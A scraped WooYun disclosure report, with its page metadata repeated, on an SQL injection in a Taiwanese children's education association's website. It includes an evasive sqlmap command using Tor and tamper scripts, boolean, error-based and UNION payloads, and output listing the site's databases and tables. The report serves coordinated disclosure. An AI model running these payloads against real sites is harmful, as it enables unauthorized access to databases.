台湾某兒童教育學會SQL注入（臺灣地區）

漏洞概要关注数(24) 关注此漏洞

缺陷编号：wooyun-2015-0161636

漏洞标题：台湾某兒童教育學會SQL注入（臺灣地區）

漏洞作者：路人甲

提交时间：2015-12-16 11:38

修复时间：2016-01-28 17:10

公开时间：2016-01-28 17:10

漏洞类型：SQL注射漏洞

危害等级：中

自评Rank：10

漏洞状态：已交由第三方合作机构(Hitcon台湾互联网漏洞报告平台)处理

漏洞来源： http://www.wooyun.org，如有疑问或需要帮助请联系 [email protected]

Tags标签：无

4人收藏收藏
分享漏洞：

漏洞详情

披露状态：

2015-12-16：细节已通知厂商并且等待厂商处理中
2015-12-17：厂商已经确认，细节仅向厂商公开
2015-12-27：细节向核心白帽子及相关领域专家公开
2016-01-06：细节向普通白帽子公开
2016-01-16：细节向实习白帽子公开
2016-01-28：细节向公众公开

简要描述：

台湾某兒童教育學會SQL注入

详细说明：

台湾某兒童教育學會SQL注入

漏洞证明：

$ ./sqlmap.py --tor --tor-type=SOCKS5 --random-agent --time-sec=20 --technique=BEU --union-char=N -u "**.**.**.**/public/index_prod.php?limit=170&textfield2=&mseq=0&main=&sub=&ssub=&order=order%20by%20%20PUBLIC_START_DATE%20DESC&word=" --tamper=between.py,space2comment.py,randomcase.py --dbms=mysql --is-dba --current-db --dbs
Parameter: mseq (GET)
    Type: boolean-based blind
    Title: OR boolean-based blind - WHERE or HAVING clause (MySQL comment)
    Payload: limit=170&textfield2=&mseq=-9682' OR 2260=2260#&main=&sub=&ssub=&order=order by  PUBLIC_START_DATE DESC&word=
    Type: error-based
    Title: MySQL OR error-based - WHERE or HAVING clause
    Payload: limit=170&textfield2=&mseq=-4512' OR 1 GROUP BY CONCAT(0x71706a7071,(SELECT (CASE WHEN (8128=8128) THEN 1 ELSE 0 END)),0x716a717a71,FLOOR(RAND(0)*2)) HAVING MIN(0)#&main=&sub=&ssub=&order=order by  PUBLIC_START_DATE DESC&word=
    Type: UNION query
    Title: MySQL UNION query (N) - 7 columns
    Payload: limit=170&textfield2=&mseq=0' UNION ALL SELECT 'N','N','N','N','N',CONCAT(0x71706a7071,0x47614c4155475a664976,0x716a717a71),'N'#&main=&sub=&ssub=&order=order by  PUBLIC_START_DATE DESC&word=
	
web application technology: Apache, PHP 5.4.38
back-end DBMS: MySQL >= 5.0.0
current database:    'ocyqrapl_asiamont'
current user is DBA:    False
available databases [2]:
[*] information_schema
[*] ocyqrapl_asiamont
Database: ocyqrapl_asiamont
+-------------------------+---------+
| Table                   | Entries |
+-------------------------+---------+
| book                    | 3857    |
| epaper_mail_ist         | 2388    |
| act_order               | 727     |
| public_table_ne         | 705     |
| cdb_stylevars           | 240     |
| cdb_settings            | 224     |
| epaper_mail_log         | 154     |
| cdb_statvars            | 110     |
| cdb_admincustom         | 92      |
| cdb_typeoptions         | 65      |
| public_table_ne_del_log | 64      |
| cdb_stats               | 50      |
<......>

仅证明漏洞存在,未dump任何用户资讯

修复方案：

过滤

版权声明：转载请注明来源路人甲@乌云

漏洞回应

厂商回应：

危害等级：高

漏洞Rank：17

确认时间：2015-12-17 19:02

厂商回复：

感謝通報

WooYun.org

漏洞概要关注数(24) 关注此漏洞

缺陷编号：wooyun-2015-0161636

漏洞标题：台湾某兒童教育學會SQL注入（臺灣地區）

相关厂商：台湾某兒童教育學會

漏洞作者：路人甲

提交时间：2015-12-16 11:38

修复时间：2016-01-28 17:10

公开时间：2016-01-28 17:10

漏洞类型：SQL注射漏洞

危害等级：中

自评Rank：10

漏洞状态：已交由第三方合作机构(Hitcon台湾互联网漏洞报告平台)处理

漏洞来源： http://www.wooyun.org，如有疑问或需要帮助请联系 [email protected]

Tags标签：无

4人收藏收藏
分享漏洞：

漏洞详情

披露状态：

简要描述：

详细说明：

漏洞证明：

修复方案：

版权声明：转载请注明来源路人甲@乌云

漏洞回应

厂商回应：

厂商回复：

最新状态：

WooYun.org

漏洞概要 关注数(24) 关注此漏洞

缺陷编号：wooyun-2015-0161636

漏洞标题：台湾某兒童教育學會SQL注入（臺灣地區）

相关厂商：台湾某兒童教育學會

漏洞作者： 路人甲

提交时间：2015-12-16 11:38

修复时间：2016-01-28 17:10

公开时间：2016-01-28 17:10

漏洞类型：SQL注射漏洞

危害等级：中

自评Rank：10

漏洞状态：已交由第三方合作机构(Hitcon台湾互联网漏洞报告平台)处理

Tags标签： 无

4人收藏 收藏 var token=""; var id="wooyun-2015-0161636"; $(".btn-fav").click(function(){ CollectBug(id,token); }); 分享漏洞：

漏洞详情

披露状态：

简要描述：

详细说明：

漏洞证明：

修复方案：

版权声明：转载请注明来源 路人甲@乌云

漏洞回应

厂商回应：

厂商回复：

最新状态：

漏洞概要关注数(24) 关注此漏洞

漏洞作者：路人甲

Tags标签：无

4人收藏收藏
分享漏洞：

版权声明：转载请注明来源路人甲@乌云